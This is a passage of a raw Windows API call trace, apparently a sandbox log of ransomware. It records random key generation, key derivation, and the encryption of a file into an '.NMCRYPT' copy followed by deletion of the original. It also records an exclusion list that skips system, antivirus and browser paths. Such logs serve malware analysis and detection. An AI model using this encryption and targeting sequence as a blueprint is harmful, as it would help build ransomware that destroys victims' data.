pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.780] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.780] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.780] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d304 | out: phHash=0x60d304) returned 1 [0164.780] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.780] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x60d308 | out: phKey=0x60d308*=0x9ad278) returned 1 [0164.780] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.780] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.780] wcslen (_String="\\\\?\\") returned 0x4 [0164.781] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad838) returned 1 [0164.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.781] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=237) returned 1 [0164.782] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.782] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xed, lpOverlapped=0x0) returned 1 [0164.783] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xed, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0164.783] GetLastError () returned 0x0 [0164.783] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0164.783] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.783] WriteFile (in: hFile=0x6a4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0x20 [0164.784] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", dwFileAttributes=0x20) returned 0 [0164.784] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 1 [0164.784] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0 [0164.785] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" [0164.785] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.785] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF72B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf72b.tmp")) returned 0xf72b [0164.785] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF72B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf72b.tmp"), dwFlags=0x1) returned 0 [0164.785] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF72B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf72b.tmp")) returned 1 [0164.786] CryptDestroyKey (hKey=0x9ad838) returned 1 [0164.786] wcslen (_String="OK") returned 0x2 [0164.786] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.786] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.786] CryptDestroyKey (hKey=0x9ad278) returned 1 [0164.786] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0164.786] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0164.786] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*NMCRYPT") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*Recovers your files.html") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.exe") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.dll") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.lnk") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.bat") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.ini") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.msi") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*.scf") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*pagefile.sys*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*AppData*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\winrar\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\java\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\windows\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\ESET\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\AVG\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*Atheros*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*Realtek*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*bootmgr*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*boot*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*boot*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*IO.SYS*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.786] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.787] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*ntldr*") returned 0 [0164.787] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*chrome*") returned 0 [0164.787] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*opera*") returned 0 [0164.787] PathMatchSpecW (pszFile="OrangeCircles.jpg", pszSpec="*firefox*") returned 0 [0164.787] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", pszSpec="*") returned 1 [0164.787] strlen (_Str="NMoreira") returned 0x8 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, 